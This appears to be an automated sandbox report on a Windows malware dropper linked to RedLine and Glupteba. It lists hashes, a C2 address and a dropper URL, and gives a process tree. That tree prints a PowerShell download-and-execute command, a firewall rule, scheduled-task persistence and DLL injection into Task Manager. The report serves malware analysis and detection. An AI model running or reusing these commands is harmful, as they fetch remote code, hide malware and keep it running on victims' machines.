Resubmissions

23-02-2023 14:06

230223-reh7eshh41 10

12-01-2023 21:04

230112-zw3w6aba39 10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-01-2023 21:04

General

  • Target

    04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe

  • Size

    13.6MB

  • MD5

    0b1677efbd5bce8a2f526817d47db0d0

  • SHA1

    b2c894a6326de4e936041fd91297290ba418e80b

  • SHA256

    04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839

  • SHA512

    a9424d510e3404e74c324689eedf10bdf3eac4faf995d58ecb12bd3240d5dfc2bdf384219211853494e029021786228a0bdc3d692c9d316edbbadf7444a7f1db

  • SSDEEP

    196608:l3y+7MIsF/TG94kw++haZt65oEsmQs7pktIaAxaWy+vMpfCfG5TkAld96eSGQ685:ZvmFlk14aZtcpdtvMgu5TkqSGQE9Rc

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://nassarplastic.com/wp-content/config_20.ps1

Extracted

Family

redline

Botnet

bharat

C2

77.73.134.15:43250

Attributes
  • auth_value

    c5ff30d03db4d68f2e19663887b8c4cb

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 14 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • VMProtect packed file 3 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Checks SCSI registry key(s) 3 TTPs 20 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Script User-Agent 1 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe
    "C:\Users\Admin\AppData\Local\Temp\04c1b9ea5b950307f032219d9713b44f915dff07548c14059b66993eba761839.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:496
    • C:\Users\Admin\AppData\Local\Temp\Resource.exe
      "C:\Users\Admin\AppData\Local\Temp\Resource.exe"
      2⤵
      • Executes dropped EXE
      PID:4804
    • C:\Users\Admin\AppData\Local\Temp\File.exe
      "C:\Users\Admin\AppData\Local\Temp\File.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5028
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        PID:4240
        • C:\Windows\system32\cmd.exe
          C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
          4⤵
            PID:1672
            • C:\Windows\system32\netsh.exe
              netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
              5⤵
              • Modifies Windows Firewall
              PID:3852
          • C:\Windows\rss\csrss.exe
            C:\Windows\rss\csrss.exe
            4⤵
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4396
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
              5⤵
              • Creates scheduled task(s)
              PID:3532
            • C:\Windows\SYSTEM32\schtasks.exe
              schtasks /delete /tn ScheduledUpdate /f
              5⤵
                PID:4032
              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:5252
              • C:\Windows\SYSTEM32\schtasks.exe
                schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                5⤵
                • Creates scheduled task(s)
                PID:5692
        • C:\Users\Admin\AppData\Local\Temp\Folder.exe
          "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
          2⤵
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:1040
          • C:\Users\Admin\AppData\Local\Temp\Folder.exe
            "C:\Users\Admin\AppData\Local\Temp\Folder.exe" -q
            3⤵
            • Executes dropped EXE
            PID:2248
        • C:\Users\Admin\AppData\Local\Temp\Files.exe
          "C:\Users\Admin\AppData\Local\Temp\Files.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4744
          • C:\Users\Admin\AppData\Local\Temp\is-DO5K3.tmp\Files.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-DO5K3.tmp\Files.tmp" /SL5="$30148,5049048,960000,C:\Users\Admin\AppData\Local\Temp\Files.exe"
            3⤵
            • Executes dropped EXE
            • Checks computer location settings
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:4308
            • C:\Users\Admin\AppData\Local\Temp\Files.exe
              "C:\Users\Admin\AppData\Local\Temp\Files.exe" /VERYSILENT
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:4704
              • C:\Users\Admin\AppData\Local\Temp\is-O31RM.tmp\Files.tmp
                "C:\Users\Admin\AppData\Local\Temp\is-O31RM.tmp\Files.tmp" /SL5="$40148,5049048,960000,C:\Users\Admin\AppData\Local\Temp\Files.exe" /VERYSILENT
                5⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:896
                • C:\Windows\SysWOW64\explorer.exe
                  explorer.exe
                  6⤵
                    PID:2532
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 184
                      7⤵
                      • Program crash
                      PID:4436
          • C:\Users\Admin\AppData\Local\Temp\Proceed.exe
            "C:\Users\Admin\AppData\Local\Temp\Proceed.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:1792
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
              3⤵
                PID:2772
            • C:\Users\Admin\AppData\Local\Temp\Continue.exe
              "C:\Users\Admin\AppData\Local\Temp\Continue.exe"
              2⤵
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:4680
              • C:\Windows\system32\cmd.exe
                "C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://nassarplastic.com/wp-content/config_20.ps1')"
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3620
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell -command IEX(New-Object Net.Webclient).DownloadString('https://nassarplastic.com/wp-content/config_20.ps1')
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2036
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\Continue.exe" >> NUL
                3⤵
                  PID:1836
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1
                    4⤵
                    • Runs ping.exe
                    PID:1192
              • C:\Users\Admin\AppData\Local\Temp\Info.exe
                "C:\Users\Admin\AppData\Local\Temp\Info.exe"
                2⤵
                • Executes dropped EXE
                • Checks SCSI registry key(s)
                • Suspicious use of AdjustPrivilegeToken
                PID:212
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 212 -s 264
                  3⤵
                  • Program crash
                  PID:4272
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.com/1bxHA4
                2⤵
                • Adds Run key to start application
                • Enumerates system info in registry
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of WriteProcessMemory
                PID:4784
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                  3⤵
                    PID:4764
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
                    3⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:5044
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2676 /prefetch:8
                    3⤵
                      PID:2032
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3848 /prefetch:1
                      3⤵
                        PID:4492
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3820 /prefetch:1
                        3⤵
                          PID:2312
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5324 /prefetch:8
                          3⤵
                            PID:4984
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5328 /prefetch:8
                            3⤵
                              PID:3736
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4360 /prefetch:1
                              3⤵
                                PID:360
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:1
                                3⤵
                                  PID:3556
                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
                                  3⤵
                                    PID:1540
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
                                    3⤵
                                    • Drops file in Program Files directory
                                    PID:5100
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x7ff7e1ba5460,0x7ff7e1ba5470,0x7ff7e1ba5480
                                      4⤵
                                        PID:5188
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1444,13877079604746947524,205638412823987404,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5976 /prefetch:8
                                      3⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:5368
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 212 -ip 212
                                  1⤵
                                    PID:3940
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xb4,0x9c,0xe0,0x40,0x104,0x7ff8532446f8,0x7ff853244708,0x7ff853244718
                                    1⤵
                                      PID:3132
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2532 -ip 2532
                                      1⤵
                                        PID:4828
                                      • C:\Windows\System32\CompPkgSrv.exe
                                        C:\Windows\System32\CompPkgSrv.exe -Embedding
                                        1⤵
                                          PID:1004
                                        • C:\Windows\system32\rundll32.exe
                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                          1⤵
                                          • Process spawned unexpected child process
                                          PID:4628
                                          • C:\Windows\SysWOW64\rundll32.exe
                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
                                            2⤵
                                            • Loads dropped DLL
                                            PID:2016
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 600
                                              3⤵
                                              • Program crash
                                              PID:1992
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
                                          1⤵
                                            PID:4568
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
                                            1⤵
                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:680
                                          • C:\Windows\system32\svchost.exe
                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                            1⤵
                                              PID:4984
                                            • C:\Windows\system32\svchost.exe
                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                              1⤵
                                                PID:3736

                                              Network

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • C:\Users\Admin\AppData\Local\Temp\Continue.exe

                                                Filesize

                                                168KB

                                                MD5

                                                48bb472e2ae054cce5c9dc4a5cc7b3f3

                                                SHA1

                                                912a0a194c37fec63ad47bb607a36a0b03c7ba73

                                                SHA256

                                                d872c348222d1ea3ce3dcadb1cb1f0837b9bff7dcf8ff915117b4038c71a7981

                                                SHA512

                                                4ce3c6d729210e87e6c1eb06efa4eb1264c68c3279a7e2fc5748539d7db044058709c582c0724bc5a67bc6e86f9f37599a8f14b376b9efe6a64b94cf54cf6f8a

                                              • C:\Users\Admin\AppData\Local\Temp\Continue.exe

                                                Filesize

                                                168KB

                                                MD5

                                                48bb472e2ae054cce5c9dc4a5cc7b3f3

                                                SHA1

                                                912a0a194c37fec63ad47bb607a36a0b03c7ba73

                                                SHA256

                                                d872c348222d1ea3ce3dcadb1cb1f0837b9bff7dcf8ff915117b4038c71a7981

                                                SHA512

                                                4ce3c6d729210e87e6c1eb06efa4eb1264c68c3279a7e2fc5748539d7db044058709c582c0724bc5a67bc6e86f9f37599a8f14b376b9efe6a64b94cf54cf6f8a

                                              • C:\Users\Admin\AppData\Local\Temp\File.exe

                                                Filesize

                                                4.0MB

                                                MD5

                                                d688c845c7f0c5672ab61996235899a1

                                                SHA1

                                                e48a046aec461c86ecfb129d576f5032349f536b

                                                SHA256

                                                3a0308e15ea0537d36990b0d1eaa3609eef6e44827a8863233f5a157767077a1

                                                SHA512

                                                6632a8d2761fe52b54be4de8a3d265f2c567eb9dfb2612d1edaace5bfe67e1a2d76dbbbef1900a7dd421bd565da4ef53e7fc672727727909a264d1b037d98089

                                              • C:\Users\Admin\AppData\Local\Temp\File.exe

                                                Filesize

                                                4.0MB

                                                MD5

                                                d688c845c7f0c5672ab61996235899a1

                                                SHA1

                                                e48a046aec461c86ecfb129d576f5032349f536b

                                                SHA256

                                                3a0308e15ea0537d36990b0d1eaa3609eef6e44827a8863233f5a157767077a1

                                                SHA512

                                                6632a8d2761fe52b54be4de8a3d265f2c567eb9dfb2612d1edaace5bfe67e1a2d76dbbbef1900a7dd421bd565da4ef53e7fc672727727909a264d1b037d98089

                                              • C:\Users\Admin\AppData\Local\Temp\File.exe

                                                Filesize

                                                4.0MB

                                                MD5

                                                d688c845c7f0c5672ab61996235899a1

                                                SHA1

                                                e48a046aec461c86ecfb129d576f5032349f536b

                                                SHA256

                                                3a0308e15ea0537d36990b0d1eaa3609eef6e44827a8863233f5a157767077a1

                                                SHA512

                                                6632a8d2761fe52b54be4de8a3d265f2c567eb9dfb2612d1edaace5bfe67e1a2d76dbbbef1900a7dd421bd565da4ef53e7fc672727727909a264d1b037d98089

                                              • C:\Users\Admin\AppData\Local\Temp\Files.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                f3276a3e369fb512a5c2095dcb4c6624

                                                SHA1

                                                8390f856ce66da71837fa51ae1791f66e686d2db

                                                SHA256

                                                4916ebf78b4e7da9fc7106a96825ec2670930dd544c64b70e6a9acf9ac146a38

                                                SHA512

                                                c65ede6cfeb6010a2160d06b7b479c7f182d4664143607686ecb194e924a2dbfe87698c19ac6dcb20db8c5a027c46ec8a647f2016e44fb27d67a2cd382e7192a

                                              • C:\Users\Admin\AppData\Local\Temp\Files.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                f3276a3e369fb512a5c2095dcb4c6624

                                                SHA1

                                                8390f856ce66da71837fa51ae1791f66e686d2db

                                                SHA256

                                                4916ebf78b4e7da9fc7106a96825ec2670930dd544c64b70e6a9acf9ac146a38

                                                SHA512

                                                c65ede6cfeb6010a2160d06b7b479c7f182d4664143607686ecb194e924a2dbfe87698c19ac6dcb20db8c5a027c46ec8a647f2016e44fb27d67a2cd382e7192a

                                              • C:\Users\Admin\AppData\Local\Temp\Files.exe

                                                Filesize

                                                5.7MB

                                                MD5

                                                f3276a3e369fb512a5c2095dcb4c6624

                                                SHA1

                                                8390f856ce66da71837fa51ae1791f66e686d2db

                                                SHA256

                                                4916ebf78b4e7da9fc7106a96825ec2670930dd544c64b70e6a9acf9ac146a38

                                                SHA512

                                                c65ede6cfeb6010a2160d06b7b479c7f182d4664143607686ecb194e924a2dbfe87698c19ac6dcb20db8c5a027c46ec8a647f2016e44fb27d67a2cd382e7192a

                                              • C:\Users\Admin\AppData\Local\Temp\Folder.exe

                                                Filesize

                                                98KB

                                                MD5

                                                bba6864f786b99e80b5cb54a8b8b0532

                                                SHA1

                                                8d6863825256693e787f2df231520a923d8990cf

                                                SHA256

                                                6545d2e001a9dcd13c8b757f9bb3628c4d506bea7e8c9322166564cf78a97b2c

                                                SHA512

                                                ba090900bcd2df5c9e4add1193decaeda4b99669aa12148cdf0a4976eaff91fa12c87ba2cd0682dd23c6121d247d5c16527516454777a2864ba70745cf39280c

                                              • C:\Users\Admin\AppData\Local\Temp\Folder.exe

                                                Filesize

                                                98KB

                                                MD5

                                                bba6864f786b99e80b5cb54a8b8b0532

                                                SHA1

                                                8d6863825256693e787f2df231520a923d8990cf

                                                SHA256

                                                6545d2e001a9dcd13c8b757f9bb3628c4d506bea7e8c9322166564cf78a97b2c

                                                SHA512

                                                ba090900bcd2df5c9e4add1193decaeda4b99669aa12148cdf0a4976eaff91fa12c87ba2cd0682dd23c6121d247d5c16527516454777a2864ba70745cf39280c

                                              • C:\Users\Admin\AppData\Local\Temp\Folder.exe

                                                Filesize

                                                98KB

                                                MD5

                                                bba6864f786b99e80b5cb54a8b8b0532

                                                SHA1

                                                8d6863825256693e787f2df231520a923d8990cf

                                                SHA256

                                                6545d2e001a9dcd13c8b757f9bb3628c4d506bea7e8c9322166564cf78a97b2c

                                                SHA512

                                                ba090900bcd2df5c9e4add1193decaeda4b99669aa12148cdf0a4976eaff91fa12c87ba2cd0682dd23c6121d247d5c16527516454777a2864ba70745cf39280c

                                              • C:\Users\Admin\AppData\Local\Temp\Info.exe

                                                Filesize

                                                1.2MB

                                                MD5

                                                ce39f9e36d89856c6cacc9f2812e7099

                                                SHA1

                                                dc8579d4d5cca12934a4368554ac1ade63d69436

                                                SHA256

                                                32b2d5f28daefc2ccab00ff4bbcf11eda6d6626f45bd446ac3317764d3ba0a74

                                                SHA512

                                                a494f94a1aeb98b344fbb961e2d673d2ffd3e903ebd1cc244e620cdd8946767cd96d7d5174d36f25c612272ce6132fefedb0e57ece6c6ae948e307c4a3bddf12

                                              • C:\Users\Admin\AppData\Local\Temp\Info.exe

                                                Filesize

                                                1.2MB

                                                MD5

                                                ce39f9e36d89856c6cacc9f2812e7099

                                                SHA1

                                                dc8579d4d5cca12934a4368554ac1ade63d69436

                                                SHA256

                                                32b2d5f28daefc2ccab00ff4bbcf11eda6d6626f45bd446ac3317764d3ba0a74

                                                SHA512

                                                a494f94a1aeb98b344fbb961e2d673d2ffd3e903ebd1cc244e620cdd8946767cd96d7d5174d36f25c612272ce6132fefedb0e57ece6c6ae948e307c4a3bddf12

                                              • C:\Users\Admin\AppData\Local\Temp\Proceed.exe

                                                Filesize

                                                217KB

                                                MD5

                                                b7573f76997bdacb9c0d8df086757693

                                                SHA1

                                                c22c7437983428bbb5abf7d190d0d0d89504d94c

                                                SHA256

                                                6feecaded2c4ee7d58e4c0d5d57b0b1fa0361f01823474393cfad2192737dce4

                                                SHA512

                                                f599daa64e51bac1237cad46e147da8a3f58d5300a65df86433085c0e684b976fd0f87c8b3b58ea419fbda3310ca1028ee03c33b9bb9084f62de05095c8664e0

                                              • C:\Users\Admin\AppData\Local\Temp\Proceed.exe

                                                Filesize

                                                217KB

                                                MD5

                                                b7573f76997bdacb9c0d8df086757693

                                                SHA1

                                                c22c7437983428bbb5abf7d190d0d0d89504d94c

                                                SHA256

                                                6feecaded2c4ee7d58e4c0d5d57b0b1fa0361f01823474393cfad2192737dce4

                                                SHA512

                                                f599daa64e51bac1237cad46e147da8a3f58d5300a65df86433085c0e684b976fd0f87c8b3b58ea419fbda3310ca1028ee03c33b9bb9084f62de05095c8664e0

                                              • C:\Users\Admin\AppData\Local\Temp\Resource.exe

                                                Filesize

                                                3.5MB

                                                MD5

                                                ae8f0f4bc862c769c505869e1ddc9cd0

                                                SHA1

                                                a35878ef57bb92d29317f507f2ba72a1d6a31d26

                                                SHA256

                                                027bb24ec6fd06cf627cf15bc33673658ac7a48e311d8ba5a2488c1b64aed102

                                                SHA512

                                                fb1c4a9aff2dad15604173b56e39f6395558814dc0664bbee87c3cd0c530a10074942fd9afae9ea772e7f9dc1b792f5e361b6e6acbf38e024e78b5a9beb336b9

                                              • C:\Users\Admin\AppData\Local\Temp\Resource.exe

                                                Filesize

                                                3.5MB

                                                MD5

                                                ae8f0f4bc862c769c505869e1ddc9cd0

                                                SHA1

                                                a35878ef57bb92d29317f507f2ba72a1d6a31d26

                                                SHA256

                                                027bb24ec6fd06cf627cf15bc33673658ac7a48e311d8ba5a2488c1b64aed102

                                                SHA512

                                                fb1c4a9aff2dad15604173b56e39f6395558814dc0664bbee87c3cd0c530a10074942fd9afae9ea772e7f9dc1b792f5e361b6e6acbf38e024e78b5a9beb336b9

                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                Filesize

                                                281KB

                                                MD5

                                                d98e33b66343e7c96158444127a117f6

                                                SHA1

                                                bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                SHA256

                                                5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                SHA512

                                                705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                              • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

                                                Filesize

                                                281KB

                                                MD5

                                                d98e33b66343e7c96158444127a117f6

                                                SHA1

                                                bb716c5509a2bf345c6c1152f6e3e1452d39d50d

                                                SHA256

                                                5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1

                                                SHA512

                                                705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

                                              • C:\Users\Admin\AppData\Local\Temp\db.dat

                                                Filesize

                                                557KB

                                                MD5

                                                66803a11ccb01230eef44d1c7b6142dd

                                                SHA1

                                                5ca0c626d85320781c8cafc5fa1df746ef270106

                                                SHA256

                                                1bd7124ca0b3dee4d3f8bf532bbc6ddb6abbd09a49eb2bf229bc6c3131fb3429

                                                SHA512

                                                8252e1eb3a9d2331b2c826065c916365a6b9ac074eaa56e5f7fe2afa9f8e7ea4afb57494eed59780dffca500fe48f8820bca3fa51763775f5685dca5b4fafcf1

